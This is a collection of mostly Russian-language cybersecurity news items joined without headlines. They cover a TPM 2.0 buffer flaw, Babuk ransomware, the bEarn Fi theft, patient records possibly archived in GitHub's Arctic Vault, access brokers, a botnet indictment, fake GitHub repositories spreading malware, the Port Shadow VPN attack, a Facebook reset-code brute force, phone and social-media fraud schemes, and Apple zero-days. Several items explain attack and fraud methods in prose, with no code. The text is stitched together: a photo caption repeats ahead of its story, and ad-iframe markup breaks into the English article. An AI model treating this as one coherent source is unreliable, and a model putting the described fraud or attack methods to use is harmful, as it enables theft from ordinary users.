Уязвимости вызваны некорректной проверкой размера параметров функции [CryptParameterDecryption()](https://trustedcomputinggroup.org/wp- content/uploads/TCG_TPM2_r1p59_Part4_SuppRoutines_code_pub.pdf), допускающей запись или чтение двух байтов за границей буфера, передаваемого в функцию ExecuteCommand() и содержащего команду TPM2.0. В зависимости от реализации прошивки перезаписываемые два байта могут повредить как неиспользуемую память, так и данные или указатели в стеке.
Эксплуатация уязвимости осуществляется через отправку TPM-модулю специально оформленных команд (атакующий должен иметь доступ к интерфейсу TPM). Проблемы устранены в выпущенном в январе обновлении спецификации TPM 2.0 (1.59 Errata 1.4, 1.38 Errata 1.13, 1.16 Errata 1.6).
Уязвимости также подвержена открытая библиотека libtpms, применяемая для программной эмуляции TPM-модулей и интеграции поддержки TPM в гипервизоры. Уязвимость устранена в выпуске libtpms 0.9.6.
Оба молодых человека и раньше привлекались к уголовной ответственности за аналогичные преступления. После задержания они были помещены под предварительный арест на 30 суток. Стоп-кадр видео полиции.
Правоохранительным органам в Кишинёве удалось задержать двоих молодых людей, которые взламывали чужие аккаунты в социальной сети Facebook, а затем под различными предлогами убеждали родственников перечислить им деньги.
Злоумышленниками оказались уроженцы Яловен и Кантемира — молодые люди 23 и 24 лет. Их подозревают как минимум в трёх эпизодах мошенничества.
Взламывая чужие пароли, подозреваемые начинали общаться с родственниками обладателя аккаунта через мессенджер. А затем под предлогом осуществления банковского перевода из-за границы убеждали своих жертв отправить им данные банковских карт и одноразовые коды.
Получив от обманутых родственников данные, молодые люди присваивали деньги посредством P2P-переводов и банкоматов.
В ходе обысков у задержанных были найдены мобильные телефоны, карты, чеки и платёжные квитанции с информацией, имеющей отношение к деяниям, в которых их подозревают.
Причиненный потерпевшим ущерб оценивается в 13 800 леев (57к ₽).
Оба молодых человека и раньше привлекались к уголовной ответственности за аналогичные преступления. После задержания они были помещены под предварительный арест на 30 суток.
Если их виновность будет доказана, мужчинам грозит до 6 лет лишения свободы.
Расследование и последующее задержание было проведено сотрудниками инспектората полиции по столичному сектору Буюканы при участии бойцов полицейского батальона спецназа Fulger и под руководством Кишинёвской прокуратуры.
Ученые из двух ведущих университетов представили способ решения квантовых задач на обычном компьютере. Этот метод можно масштабировать на относительно бюджетные устройства.
Физики из Швейцарского федерального технологического института Лозанны (EPFL) и Колумбийского университета представили подход к моделированию квантового алгоритма с помощью обычного компьютера. Новый подход использует классический алгоритм машинного обучения, который имитирует поведение квантовых компьютеров ближайшего будущего.
В работе, опубликованной в журнале Nature Quantum Information, профессор EPFL Джузеппе Карлео и аспирант Колумбийского университета Матия Медвидович, нашли способ выполнить сложный алгоритм квантовых вычислений на традиционных компьютерах вместо квантовых.
«Квантовое программное обеспечение», известное как Quantum Approximate Optimization Algorithm (QAOA) используется для решения классических задач оптимизации в математике. По сути, это способ выбора наилучшего решения задачи из множества возможных решений. Существует большой интерес к пониманию того, какие проблемы могут быть эффективно решены квантовым компьютером, и QAOA является одним из наиболее заметных кандидатов для этого», — объяснил Карлео.
У QAOA есть множество сторонников, в том числе и Google, который делает ставку на квантовые технологии и вычисления в ближайшем будущем: в 2019 году они создали Sycamore, 53-кубитный квантовый процессор, и использовали его для выполнения задачи, на которую, по их оценкам, современному классическому суперкомпьютеру потребовалось бы около 10 тыс. лет. Sycamore выполнил ту же задачу за 200 секунд.
Используя обычные компьютеры, ученые разработали метод, который может приблизительно имитировать поведение особого класса алгоритмов, известных как вариационные квантовые алгоритмы, они представляют собой способы определения состояния с наименьшей энергией или «основного состояния» квантовой системы. QAOA является одним из важных примеров такого семейства квантовых алгоритмов, которые, по мнению исследователей, являются одними из наиболее перспективных кандидатов на «квантовое преимущество» в компьютерах ближайшего будущего.
В основе подхода лежит идея о том, что современные инструменты машинного обучения можно использовать для обучения и эмуляции внутренней работы квантового компьютера. Ключевым инструментом для этих симуляций является Neural Network Quantum States, искусственная нейронная сеть, которую Карлео разработал в 2016 году вместе с Матиасом Тройером и которая теперь впервые использовали для симуляции QAOA.
• Source: https://phys.org/news/2021-08-quantum-software-classical.html
Если Babuk продолжит осуществлять атаки быстрыми темпами, группировка может стать серьезной угрозой, как и Egregor.
Команда специалистов Sogeti CERT ESEC Threat Intelligence (CETI) провела анализ деятельности операторов вымогательского ПО Babuk и рассказала, как быстро новая группировка может приспособиться к проведению одиночного, двойного и даже тройного вымогательства. Не менее быстро операторы Babuk перешли на бизнес-модель «вымогательское-ПО-как-услуга», начав нанимать партнеров на подпольных русскоязычных форумах.
В отличие от других вымогателей, участники Babuk размещают рекламные сообщения на английском языке на популярных хакерских форумах. Во вредоносном ПО Babuk также отсутствует так называемая мера безопасности «Kill Switch», которая обычно включается при обнаружении по умолчанию установленных языков Содружества Независимых Государств (СНГ) на атакованных устройствах.
Хакеры создали собственный сайт утечек данных для публикации украденных сведений жертв в рамках стратегии двойного вымогательства. Преступники также опубликовали список компаний и организаций, которые они не будут атаковать, с некоторыми исключениями в виде благотворительных фондов, помогающих BLM и ЛГБТ.
Новый вымогатель поставляется без каких-либо механизмов обфускации исходного кода. Тем не менее, группировка использует надежную схему шифрования, которая почти не может быть взломана. Хакеры применяют самодельный алгоритм SHA256 Chacha8 для шифрования и защищают ключи с помощью ECDH. Babuk может принимать дополнительные параметры командной строки при установке. Если параметры не указаны, будут шифроваться только локальные диски.
Операторы Babuk уже успели атаковать организации в сфере здравоохранения, банки, компании в области розничных продаж и транспортные предприятия. Как сообщили в McAfee, атаки затронули компании и организации в Израиле, США, Индии, Люксембурге, Италии, Испании, Южной Африке, Объединенных Арабских Эмиратах, Великобритании, Китае и Германии.
По словам экспертов, преступники используют английский разговорный язык для общения на подпольных форумах. Предположительно, они не являются носителями английского языка, поскольку специалисты выявили несколько орфографических ошибок и неродных выражений.
Диапазон сумм выкупа составляет от $60 тыс. до $85 тыс., и по крайней мере одна жертва согласилась заплатить самую высокую сумму. Каждый образец программы-вымогателя Babuk специально настроен для жертвы с помощью записки о выкупе и URL-ссылки, указывающей на чат для переговоров по оплате.
Стремясь установить личность и отследить цифровой отпечаток злоумышленника под псевдонимом Biba99, эксперты в ходе расследования выявили в Instagram общедоступную учетную запись пользователя из Казахстана. Человек на различных фотографиях появляется как в полицейской, так и в военной форме, что свидетельствует о явном отсутствии осведомленности о мерах оперативной безопасности (OPSEC), которые возложены на правоохранительные органы в социальных сетях. Специалисты предполагают, что данный пользователь может быть оператором Babuk.
По оценкам исследователей, если новая группировка продолжит свои целевые атаки такими быстрыми темпами, Babuk может стать серьезной угрозой, как и Egregor, к которому перешли многие филиалы Maze.
Межсетевой протокол фарминга bEarn Fi на Binance Smart Chain подвергся атаке в прошедшие выходные. Злоумышленники вывели из протокола криптоактивы стоимостью $11 млн.
На очередной протокол DeFi на базе Binance Smart Chain была совершена атака. В воскресенье, во второй половине дня, разработчики межсетевого протокола фарминга bEarn Fi сообщили, что в работе приложения обнаружены сбои. В официальном аккаунте bEarn Fi в Twitter говорится:
«Уважаемое сообщество, мы знаем, что депозит пользователей в BUSD значительно увеличился. Сообщаем, что в настоящее время мы расследуем инцидент с хранилищем Alpaca Vault. Никакие другие bVault не пострадали, но мы приняли меры предосторожности и временно приостановили снятие денег и депозиты для всех bVaults».
Пресс-секретарь аналитической фирмы PeckShield сообщил, что аналитики все еще расследуют причину атаки, но уже известно, что инцидент привел к потере bEarn Fi криптоактивов примерно на $11 млн.
В группе Telegram bEarn Fi пользователи с утра воскресенья задают членам команды bEarn Fi вопросы о том, что случилось с хранилищем Binance USD (BUSD) на bEarn Fi. «Есть проблема с хранилищем BUSD?» – спросил один из пользователей. «Оно растет настолько, что это невозможно».
«Мы работаем над этим», – написал один из членов команды bEarn Fi в ответ на многочисленные запросы пользователей о том, в безопасности ли их средства.
Напомним, что в конце апреля проект DeFi Uranium Finance, работающий на Binance Smart Chain, был взломан во время миграции. Хакеры смогли украсть различные токены на $50 млн. Кроме того, на прошлой неделе криптовалютный аналитик Crypto Pwnage сообщил, что токены стоимостью более $1.8 млн выведены из одного из пулов PancakeSwap.
GitHub Arctic Code Vault has likely captured sensitive patient medical records from multiple healthcare facilities in a data leak attributed to MedData.
The private data was leaked on GitHub repositories last year whose contributors carry the "Arctic Code Vault" badge.
This means, these repositories could now be a part of a huge open-source repo
collection bound to last a 1,000 years.
Although in the gray area of international copyright law and regulations
pertaining to protection of patients' personally identifiable information
(PII), the archived data might be a bit of a daunting task for anyone to
extract and remove.
Last year, GitHub came out with an archival initiative titled Arctic Code
Vault that focused on preserving the vast
majority of open-source artifacts published on the website, by porting these
onto physical media that could stand the test of time.
To preserve the open-source community's contributions over the last few
decades, billions of lines of code from GitHub repositories, current as of
February 2nd, 2020, were printed on a hardened film designed to last for a
thousand years.
These rolls of films were then shipped off to the GitHub Arctic Code Vault,
situated in a remote coal mine, deep under an Arctic mountain in Svalbard,
Norway, which is relatively close to the North Pole.
But, given its popularity and vast adoption rate, GitHub has been used in all kinds of situations: from developers storing legitimate software code, to attackers abusing GitHub for hosting malware like Gitpaste-12, to repositories that were later found to be leaking passwords and API keys that shouldn't have made their way on GitHub to begin with.
Should these artifacts also get their place in the history?
In an ironic twist of fate, a Dutch researcher Jelle Ursem, in collaboration with Dissent Doe of DataBreaches.net, discovered this could be the case with patient medical records associated with the MedData data leak.
This week, multiple medical facilities including Memorial Hermann ,
University of Chicago , Aspirus , OSF Healthcare , King’s Daughters
and SCL Health have come forward, issuing privacy incident and HIPAA breach
notices related to the MedData PII leak.
According to these notices, confidential patient records kept by MedData, a
national provider of healthcare revenue cycle management solutions, were
uploaded by one of their former employees to GitHub during or before September
2019.
Although the files were removed by GitHub on December 17th, 2020, considering the Arctic Vault archive was finalized on February 2nd, 2020, the data very likely made its way into the historic collection:
Contributor(s)
of GitHub repository with patient data have the Arctic Code Vault Contributor
badge
Source: Databreaches.net
In August 2020, Ursem and Doe had jointly
[published](https://www.databreaches.net/wp-content/uploads/No-need-to-hack-
when-its-leaking.pdf) details on the nine healthcare data leaks on GitHub that
impacted medical records of 150,000 to200,000 patients.
The researchers shortly identified another data leak from on GitHub which they traced to MedData.
They then informed MedData of this leak on December 10, 2020.
But it wasn't until now that impacted patients have been notified by the company:
"Impacted covered entities whose patient's data was affected were notified on February 8, 2021. Letters were mailed to impacted individuals and applicable regulatory agencies on March 31, 2021," states MedData in an incident notice, which continues:
From our investigation, it appears that impacted information may have included individuals’ names , in combination with one or more of the following data elements: physical address, date of birth, Social Security number, diagnosis, condition, claim information, date of service, subscriber ID (subscriber IDs may be Social Security numbers), medical procedure codes, provider name, and health insurance policy number.
Last year, when Ursem had informed MedData of this data leak, and the possibility that this data had slipped into GitHub's Arctic Vault, MedData further contacted GitHub asking for logs of the vault, and to discuss removal of such data from the vault, say the researchers.
"We do not know what transpired after that, although there had been some muttering that MedData might sue GitHub to get the logs," say Ursem and Doe in a report published April 1st, which the researchers wished was an April Fools' Day joke.
Ursem had asked GitHub in 2020, what would happen if a repository containing PII or other sensitive data had made its way into the Arctic Code Vault.
He wondered, if GitHub could just go in and extract a single repository or would someone's medical data now be a part of the 1,000-year strong collection?
The researcher told BleepingComputer:


{"uid":"d","hostPeerName":"https://www.bleepingcomputer[.]com","initialGeometry":"{"windowCoords_t":0,"windowCoords_r":1440,"windowCoords_b":872,"windowCoords_l":0,"frameCoords_t":4420.3125,"frameCoords_r":694,"frameCoords_b":4670.3125,"frameCoords_l":394,"styleZIndex":"auto","allowedExpansion_t":0,"allowedExpansion_r":0,"allowedExpansion_b":0,"allowedExpansion_l":0,"xInView":0,"yInView":0}","permissions":"{"expandByOverlay":false,"expandByPush":false,"readCookie":false,"writeCookie":false}","metadata":"{"shared":{"sf_ver":"1-0-38","ck_on":1,"flash_ver":"0"}}","reportCreativeGeometry":false,"isDifferentSourceWindow":false,"goog_safeframe_hlt":{},"encryptionMode":null}"
scrolling="no" marginwidth="0" marginheight="0" width="300" height="250" data-
is-safeframe="true" sandbox="allow-forms allow-popups allow-popups-to-escape-
sandbox allow-same-origin allow-scripts allow-top-navigation-by-user-
activation" data-google-container-id="d" style="box-sizing: border-box;
border: 0px; vertical-align: bottom;">
"GitHub indeed didn't get back to me, possibly for legal reasons. I don't even
think anyone had remotely considered this might happen."
"This is actually the first occurrence of something that I noticed may have ended up in the vault, but there's no telling how much more data that's not supposed to be there is in there, because there is no public way to verify this unfortunately."
"Imagine if a current day researcher stumbled upon an archive from a thousand years ago today that detailed people's medical issues from an era, described so thoroughly."
"They would have a field day," Ursem told BleepingComputer in an email interview.
Although realistically, nobody might go through the trouble of getting to the grand Vault to retrieve leaked materials now purged from GitHub, it does open up a question for what course of action exists for GitHub and companies when incidents such as this recent MedData leak take place.
Regulations around the world such as HIPAA, UK Data Protection Act, and GDPR strictly dictate how healthcare records and patient PII data are supposed to be handled, and the steps that need to be taken in the event of a data breach.
Last year, GitHub removed the YouTube-DL source code following a report of DMCA (copyright) violation, only to reinstate it later.
But, this code being fairly old very likely got archived in the Arctic Code Vault, according to the criteria specified by GitHub on what repositories get archived.
The Arctic Code Vault FAQ also states that repositories deleted from GitHub, may not be deleted from all warm storage partners:
"Keeping a historic view is an important part of each archive. If you have a concern about your repository continuing to be a part of the archive, please contact the archives."
"For the GitHub Arctic Code Vault, we are unable to remove data that has already been stored."
But, according to GitHub, archives have a special status under GDPR, giving
them some safe harbor:
"Warm storage contains more thorough information, but archives have a special
legal status under GDPR which protects them. GitHub’s Legal Team has approved
the Archive Program," states the FAQ section.
This indicates copyrighted works or otherwise legally objectionable material, although removed from GitHub, could continue to sit in the remote Vault for a millennium.
"We hope that GitHub cooperated with MedData, but we raise the issue here because we will bet you that many developers and firms have never even considered what might happen that could go so very wrong," the researchers concluded in their latest [report](https://www.databreaches.net/good-luck- explaining-to-hhs-why-your-phi-is-in-githubs-vault-for-the-next-1000-years/).
Update 7:46 AM ET: Changed the headline and parts of the article to make it clear it is likely patient records from the MetData leak have been archived in the Vault.
В условиях пандемии и повсеместного перехода на удаленку торговля первичным доступом к сетям различных компаний и организаций набирает обороты, предупреждают аналитики компании Digital Shadows.
Так называемые «брокеры первичного доступа» взламывают сети компаний и компрометируют сотрудников, но не заходят дальше этого и действуют как посредники, продавая полученный доступ другим злоумышленникам (часто операторам программ-вымогателей).
Исследователи отмечают, с 2016 года эта сфера стала намного активнее, и за прошедшие годы многие подпольные маркетплейсы были реорганизованы и обзавелись специальными разделами для продажи подобных «товаров». В настоящее время таких торговых площадок уже насчитывается около 500.
По данным компании, на сегодня средняя цена доступа к чужой сети составляет 7100 долларов США, причем итоговая стоимость зависит от дохода организации, количества сотрудников, количества доступных устройств и типа доступа.
Наиболее популярным методом проникновения в чужие сети по-прежнему остается RDP — 17% от общего числа объявлений. Также у RDP-доступа самая высокая средняя цена — 9800 долларов. Не зря представители ФБР предупреждали, что в 70-80% случаев исходный плацдарм злоумышленников – это именно компрометация RDP.
Доступ уровня администратора домена также ценится на черном рынке: таких объявлений насчитывается 16% от общего числа, и средняя цена оставляет 8187 долларов.
Также из-за общемировой тенденции перехода на удаленную работу вырос спрос на доступ к VPN, который предоставляет доступ к чужой корпоративной сети. Средняя цена такого доступа составляет 2871 доллар (15% от общего числа объявлений).
Кроме уже перечисленных векторов проникновения в чужие сети спросом также пользуются Citrix Access (7%), различные панели управления (6%), CMS (5%) и шеллы (5%).
Источник: xakep.ru/2021/02/25/initial-access-brokers/
В Соединённых Штатах был предъявлен обвинительный акт в отношении гражданина Молдовы Александра Лефтерова, который является владельцем крупной ботнет-сети, заразившей тысячи компьютеров по всей стране. Лефтеров, также известный под псевдонимами Alipako, Uptime и Alipatime, обвиняется в мошенничестве с использованием Интернета, компьютерном мошенничестве и заговоре с целью совершения этих преступлений. 17 апреля представители ФБР официально заявили о том, что мужчина объявлен в розыск.
По данным Министерства юстиции США, мужчина и его сообщники использовали вредоносное ПО для кражи учётных данных с инфицированных устройств. Злоумышленники получали доступ к финансовым счетам жертв, используя веб- браузеры на заражённых компьютерах, что позволяло им проводить операции, маскируясь под легитимных пользователей.
Особенность ботнета заключалась в использовании скрытого сервера виртуального сетевого вычисления (hVNC), что давало прямой доступ к компьютерам жертв без их ведома. Через этот сервер Лефтеров и его соучастники не только воровали деньги, но и предоставляли доступ к ботнету другим киберпреступникам для распространения вредоносного ПО, включая программы-вымогатели.
Кроме того, Лефтеров якобы арендовал ботнет другим преступникам, предоставляя им доступ к заражённым компьютерам и украденным учётным данным. От таких операций он, разумеется, получал определённый процент прибыли арендующих.
Обвинения против Лефтерова включают несанкционированный доступ к защищённым компьютерам, проведение мошеннических операций с использованием сети Интернет и умышленное повреждение защищённых компьютеров.
Если киберпреступника поймают, в зависимости от степени тяжести доказанных преступлений ему может грозить от 2 до 10 лет тюремного заключения.
Специальный агент ФБР Кевин Роджек подчеркнул: «Защита американцев в киберпространстве является приоритетной задачей. Мы будем решительно преследовать любого, кто считает наш народ лёгкой добычей, независимо от того, находится ли он на территории США или за её пределами».
sc: fbi.gov/wanted/cyber/alexander-lefterov
sc: documentcloud.org/documents/24554283-alexander-lefterov-botnet-operator-
indictment
Check Point раскрыла сеть из 3000 поддельных аккаунтов на GitHub, которые активно распространяют вредоносные программы и фишинговые ссылки. Деятельность началась как минимум в мае прошлого года.
Наиболее активный киберпреступник, получивший прозвище Stargazer Goblin, использует платформу для размещения зловредных репозиториев. Изюминка кампании заключается в способности делать вредоносные репозитории похожими на легитимные за счет таких действий, как добавление звездочек (аналог лайков), форков (аналог ретвитов) и подписок. Торговля репозиториями и «звездами» координируется через каналы в Telegram и в даркнете.
Аккаунт Stargazer Ghost
Сеть Stargazers Ghost Network распространяет вредоносные репозитории, предлагающие инструменты для соцсетей, игр и криптовалют. Репозитории якобы предоставляют код доступа к VPN или лицензии Adobe Photoshop, и в основном нацелены на пользователей Windows. Цель злоумышленников – атаковать жертв, которые ищут бесплатное ПО.
Оператор сети продает свои услуги другим хакерам, называя это Distribution-as- a-Service (DaaS). Сеть распространяет различные типы вредоносного ПО, включая шифровальщики и инфостилеры – Atlantida Stealer, Rhadamanthys и Lumma Stealer.
Check Point предполагает, что сеть может быть больше, чем кажется, поскольку в кампании принимают участие легитимные аккаунты GitHub, которые были взломаны с помощью украденных учетных данных. По оценкам, общая сумма «заработка» преступника за время существования операции оценивается примерно в $100 000.
Репозитории, созданные по одному шаблону и нацеленные на пользователей TikTok, YouTube, Twitch, Instagram*
По словам специалистов, деятельность сети – «звездочки» и «просмотры» страниц – вероятно автоматизирована, так как репозитории обрабатываются в быстрой последовательности и созданы по одному шаблону. Выявить такую активность сложно, поскольку поведение аккаунтов имитирует действия обычных пользователей GitHub.
Stargazer Goblin создал сложную операцию по распространению вредоносного ПО, избегая обнаружения из-за высокого уровня доверия к GitHub. Это позволяет обходить подозрения и быстро восстанавливать свои действия, когда GitHub нарушает сеть. Используя несколько аккаунтов и профилей для разных задач (установка звезд, размещение репозиториев, коммитинг фишинговых шаблонов, хостинг вредоносных релизов), сеть Stargazers Ghost Network минимизирует потери при действиях GitHub, так как обычно нарушается только одна часть операции, а не все аккаунты.
research.checkpoint.com/2024/stargazers-ghost-network/
Группа исследователей из канадских и американских университетов [разработала](https://citizenlab.ca/2024/07/vulnerabilities-in-vpns-paper- presented-at-the-privacy-enhancing-technologies-symposium-2024/) технику атаки Port Shadow, позволяющую через манипуляцию с таблицами трансляции адресов на стороне VPN-сервера добиться отправки ответа на запрос другому пользователю, подключённому к тому же VPN- серверу. Метод может быть использован для организации перехвата или перенаправления шифрованного трафика, проведения сканирования портов и деанонимизации пользователей VPN. В качестве примера показано как можно использовать метод для перенаправления на хост атакующего DNS-запросов пользователя, работающего через VPN-сервер, к которому в качестве клиента имеет возможность подключиться атакующий.
Для совершения атаки злоумышленник должен иметь возможность подключения к одному VPN-серверу с жертвой, что возможно, например, при использовании типовых VPN-операторов и публичных VPN-сервисов, предоставляющих доступ всем желающим. Уязвимость затрагивает VPN-серверы, использующие трансляцию адресов (NAT) для организации обращения клиентов к внешним ресурсам, при том, что для приёма трафика от клиентов и отправки запросов к внешним сайтам на сервере должен использоваться один и тот же IP-адрес.
Атака основана на том, что через отправку специально оформленных запросов атакующий, подключённый к тому же VPN-серверу и использующий общий NAT, может добиться искажения содержимого таблиц трансляции адресов, которое приведёт к тому, что пакеты, адресованные одному пользователю, будут направлены другому пользователю. В таблицах трансляции адресов информация о том, с каким внутренним IP-адресом сопоставлен отправленный запрос, определяется на основе номера исходного сетевого порта, использованного при отправке запроса. Атакующий через отправку определённых SYN- и ACK-пакетов и одновременных манипуляций со стороны клиентского соединения к VPN-серверу и со стороны подконтрольного атакующего внешнего сервера может добиться возникновения коллизии в таблице NAT и добавления записи с тем же номером исходного порта, но ассоциированной с его локальным адресом, что приведёт к тому, что ответы на чужой запрос будут возвращены на адрес атакующего.
В ходе исследования были протестированы системы трансляции адресов Linux и FreeBSD в сочетании с VPN OpenVPN, OpenConnect и WireGuard. Платформа FreeBSD оказалась не подвержена методам атаки по перенаправлению запросов, осуществляемым со стороны других пользователей, подключённых к тому же VPN. Подстановку в таблицы NAT удалось совершить только в ходе атаки ATIP (Adjacent-to-In-Path), при которой атакующий может вклиниться в трафик между пользователем и VPN-сервером (например, когда пользователь подключается к подконтрольной атакующему сети Wi-Fi) или между VPN-сервером и целевым сайтом. При этом NAT FreeBSD также затронула атака, позволяющая определить факт подключения пользователя к определённому сайту (Connection Inference).
Что касается Linux, то подсистема Netfilter оказалась подвержена атакам по подстановке записей в таблицу трансляции адресов, позволяющим перенаправить входящие пакеты другому пользователю, добиться отправки пакетов вне шифрованного VPN-канала (Decapsulation) или определить открытые сетевые порты на стороне клиента.
В качестве мер для блокирования атаки VPN-провайдерам рекомендуется использовать адекватные методы рандомизации номеров исходных портов в NAT, ограничить число допустимых одновременных соединений к VPN-серверу от одного пользователя, а также блокировать возможность выбора клиентом сетевого порта, принимающего запросы на стороне VPN-сервера.
По мнению представителя компании Proton AG, атака не затрагивает VPN-сервисы, в которых используются раздельные IP для входящих и исходящих запросов. Кроме того, имеются сомнения в возможности применения атаки к реальным VPN-сервисам, так как успешная атака пока продемонстрирована только в лабораторных тестах и для её проведения требуется выполнение определённых условий на стороне VPN-сервера и атакуемого клиента. Кроме того, атака может быть полезна только для манипуляций с незашифрованными запросами, такими как обращение к DNS, в то время как использование TLS и HTTPS на уровне приложений делает перенаправление трафика бесполезным.
Манипулирующие с таблицами трансляции адресов атаки применимы не только к VPN, но и к беспроводным сетям, в которых для организации подключения пользователей к внешним ресурсам на точке доступа используется NAT. В прошлом месяце [опубликованы](https://blog.apnic.net/2024/06/18/off-path-tcp-hijacking-in- nat-enabled-wi-fi-networks/) результаты исследования возможности проведения похожей атаки по перехвату TCP-соединений других пользователей беспроводной сети. Метод атаки оказался применим к 24 из 33 протестированным беспроводным точкам доступа.
Предложенная для Wi-Fi [атака](https://www.ndss-symposium.org/wp- content/uploads/2024-419-paper.pdf) оказалась значительно проще, чем вышеотмеченный метод для VPN, так как из-за применения оптимизаций, многие точки доступа не проверяют корректность номеров последовательностей в TCP- пакетах. В итоге, для атаки достаточно было отправить фиктивный RST-пакет для очистки записи в таблице трансляции адресов, а затем добиться направления ответа на хост атакующего для определения номеров последовательности (SEQ) и подтверждения (ACK), необходимых для перехвата TCP-соединения.
Непальский исследователь кибербезопасности Самип Арьял вошел в историю, обнаружив уязвимость в системе сброса пароля Facebook*, которая позволяла злоумышленнику без всяких действий со стороны жертвы завладеть любой учетной записью.
Открытие не только принесло Арьялу рекордное вознаграждение от компании, но и высшую позицию в Зале Славы Facebook среди белых хакеров за 2024 год. Сумма вознаграждения, однако, остается неизвестной.
Арьял выявил, что функция сброса пароля Facebook не имела ограничения по количеству попыток запроса кода, что давало возможность проведения атак без участия пользователя. Атакующий мог отправить запрос на сброс пароля и методом брутфорса подобрать 6-значный код безопасности.
[Исследование](https://infosecwriteups.com/0-click-account-takeover-on- facebook-e4120651e23e) Арьяла показало, что при сбросе пароля через Android Studio пользователю предлагалось получить код безопасности через уведомление на Facebook, причем код оставался действительным в течение 2-ух часов, даже если были предприняты неудачные попытки его ввода. Арьял отметил, что в отличие от сброса по SMS, код не аннулировался после нескольких ошибочных попыток.
Применяя метод брутфорса, Арьял смог проверить все возможные комбинации кодов за час, выявив уязвимость, позволяющую отображать код непосредственно в уведомлении без необходимости клика по нему. Арьял сообщил о недостатке Facebook 30 января 2024 года, и уже ко 2 февраля проблема была устранена.
Железнодорожным районным судом г. Ростова-на-Дону рассмотрено уголовное дело о неправомерном воздействии на критическую информационную инфраструктуру Российской Федерации. версия для печати
Железнодорожным районным судом г. Ростова-на-Дону рассмотрено уголовное дело в отношении Баяндина И.М., признанного виновным в совершении преступления, предусмотренного ч. 1 ст. 274.1 УК РФ (использование компьютерной программы и иной компьютерной информации, заведомо предназначенных для неправомерного воздействия на критическую информационную инфраструктуру Российской Федерации, в том числе для блокирования информации, содержащейся в ней).
Судом установлено, что Баяндин И.М., обладающий специальными знаниями в области информационных технологий, приискал Интернет-ресурс, предназначенный для блокирования деятельности сайтов российских компаний, относящихся к критической информационной инфраструктуре Российской Федерации, функционирующей в банковской сфере, в сфере топливно-энергетического комплекса и в сфере связи, путем осуществления компьютерных атак, поскольку негативно относился к проводимой Российской Федерацией Специальной Военной Операции на территории Украины, и осознавая принцип работы указанного Интернет-ресурса использовал его, осуществив тем самым на данные сайты хакерскую атаку.
В судебном заседании подсудимый Баяндин И.М. свою вину в совершении указанного преступления признал в полном объеме.
Суд назначил Баяндину И.М. наказание в виде лишения свободы на срок 2 года с отбыванием наказания в колонии-поселении, со штрафом в размере 500 000 рублей.
Приговор суда в законную силу не вступил.
Фейковые сообщения и комментарии в соцсетях публиковались якобы от рядовых граждан Украины. Ботоферма насчитывала по меньшей мере 4 тысячи фейковых аккаунтов. За каждого созданного бота правонарушители получали оплату в рублях. Теперь за содеянное им грозит до 15 лет заключения.
Преступную деятельность вражеской ботофермы в пользу агрессора разоблачили следователи Винницкого районного управления полиции, областного главка вместе с оперативниками отдела противодействия киберпреступлениям в Винницкой области. В состав группы входило трое винничан в возрасте 30, 38 и 42 года.
Злоумышленники организовали работу «ботофермы» с использованием российских сервисов. Они ежедневно регистрировали около 500 анонимных учетных записей в различных социальных сетях, на торговых онлайн-площадках, месседжерах, в том числе и запрещенных в Украине.
Бот-аккаунты в соцсетях использовались для дискредитации Сил обороны Украины, оправдывания вооруженной агрессии рф, формирования у украинцев общественного мнения в интересах врага, расшатывания общественно-политической ситуации в стране.
Фейковые аккаунты также использовались для совершения мошеннических действий на торговых площадках.
За предоставленные услуги злоумышленники получали выплаты в российских рублях. В дальнейшем, с помощью подсанкционных платежных систем «WebMoney» «PerfectMoney», конвертировали их в криптовалюту и выводили на подконтрольные банковские карточки.
Общий оборот средств, полученных правонарушителями от преступной деятельности «ботофермы», составлял более полумиллиона гривен за месяц.
«Ботоферму» злоумышленники обустроили в гаражном помещении областного центра. Во время обысков правоохранители изъяли компьютерную технику с доказательствами незаконной деятельности, мобильные телефоны, более 3300 SIM- карт украинских и европейских операторов мобильной связи, 13 SIM-шлюзов и другое оборудование и программное обеспечение, банковские карточки, через которые они получали деньги от «клиентов».
Следственные действия проводились при оперативном сопровождении работников УСБУ в Винницкой области. Процессуальное руководство осуществляет Винницкая окружная прокуратура.
Компания Apple устранила три уязвимости нулевого дня, которые уже использовались в атаках на пользователей iPhone, Mac и iPad. Все три ошибки были обнаружены в движке WebKit и получили идентификаторы CVE-2023-32409, CVE-2023-28204 и CVE-2023-32373.
Первая уязвимость представляет собой побег из песочницы и позволяет удаленным злоумышленникам выйти из песочниц для веб-контента. Две других уязвимости, это проблема out-of-bounds чтения, которая позволяет получить доступ к конфиденциальной информации, а также use-after-free баг, позволяющий добиться выполнения произвольного кода на скомпрометированных устройствах. Эксплуатация всех проблем подразумевает, что сначала цель должна загрузить вредоносную веб- страницу (веб-контент).
Apple устранила эти 0-day в macOS Ventura 13.4, iOS и iPadOS 16.5, tvOS 16.5, watchOS 9.5 и Safari 16.5. При этом список затронутых ими устройств весьма широк и включает как новые, так и старые модели гаджетов Apple:
При этом в компании сообщили, что впервые уязвимости CVE-2023-28204 и CVE-2023-32373 были устранены еще 1 мая, с помощью патчей Rapid Security Response (RSR) для устройств iOS 16.4.1 и macOS 13.3.1.
Хотя Apple предупреждает, что все исправленные уязвимости уже используются хакерами, в компании не предоставили никакой информации об этих атаках.
Двое мужчин в телефонных разговорах уверяли граждан, что к их счетам получили доступ посторонние лица. «Для защиты» просили назвать все банковские данные, а получив их - присваивали деньги потерпевших. Общая сумма ущерба составляет около миллиона гривен.
Незаконную схему «провернули» двое друзей: они звонили гражданам, выдавая себя за представителей банка, и убеждали, что доступ к их счетам получили мошенники. Чтобы сохранить деньги и заблокировать подозрительные операции, злоумышленники выпытывали номер, CVV-код, PIN-код карточки и срок действия.
Эти сведения фигуранты «привязывали» к платежным системам и, используя технологию NFC, снимали наличные в банкоматах. Для этого у пострадавших они также запрашивали код-подтверждение.
По предварительным подсчетам, злоумышленники обманули около 60 граждан, преимущественно старшего возраста. Общая сумма убытков достигает миллиона гривен.
В домах фигурантов сотрудники полиции провели обыски. Изъяты мобильные телефоны, более 30 банковских карт, SIM-карты и флеш-накопители. К проведению следственных действий также привлекли сотрудников батальона полиции особого назначения.
Злоумышленникам объявили подозрение по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы.
Следственные действия продолжаются.
Подозреваемым избрана мера пресечения в виде содержания под стражей.
